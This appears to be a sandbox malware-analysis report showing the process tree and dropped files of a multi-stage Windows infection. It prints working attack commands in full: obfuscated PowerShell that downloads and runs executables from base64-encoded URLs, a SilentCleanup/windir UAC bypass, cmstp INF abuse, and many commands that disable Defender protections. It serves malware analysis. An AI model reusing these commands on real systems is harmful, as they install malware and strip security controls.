C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"{path}"7⤵
- Executes dropped EXE
-
C:\Users\Public\txi.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\hazyeme1.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\txi.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\mkx.exe"C:\Users\Public\mkx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4668 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\523709105068992\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 46689⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\mkx.exe"C:\Users\Public\mkx.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "9⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\rnwabiyd.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\mkx.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\vokybpfg.exe2⤵
-
C:\Windows\temp\vokybpfg.exeC:\Windows\temp\vokybpfg.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\wmimpxhi.exe2⤵
-
C:\Windows\temp\wmimpxhi.exeC:\Windows\temp\wmimpxhi.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\d3ddde34bd2148579399e0ec6b9aecac /t 416 /p 5041⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a5dd4706d9064727a4d6b934f7cb734a /t 2972 /p 29681⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b1819abdb2684d88930136de7e580d56 /t 2328 /p 58001⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\79b9954a1bc942248a851d20a38d1381 /t 2720 /p 22401⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1nONCENDZY.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3glqQ5zu6q.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q0ASSF3gqn.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SmMNW0P9JH.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zfog5KVMBE.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tdwmwhz8zi.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LKZ4EUPR.cookie
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
